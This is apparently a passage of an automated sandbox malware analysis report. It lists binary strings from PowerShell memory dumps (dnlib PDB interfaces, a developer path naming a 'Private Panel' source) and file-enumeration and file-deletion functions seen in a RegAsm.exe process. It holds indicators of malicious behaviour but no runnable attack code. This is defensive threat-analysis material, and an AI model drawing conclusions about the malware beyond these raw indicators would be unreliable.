                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdb source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: 7C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.pdbhP0 source: powershell.exe, 00000007.00000002.490691993.0000000002730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407877 FindFirstFileW,FindNextFileW,17_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044E8F9 FindFirstFileExA,17_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,17_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10006580 FindFirstFileExA,17_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
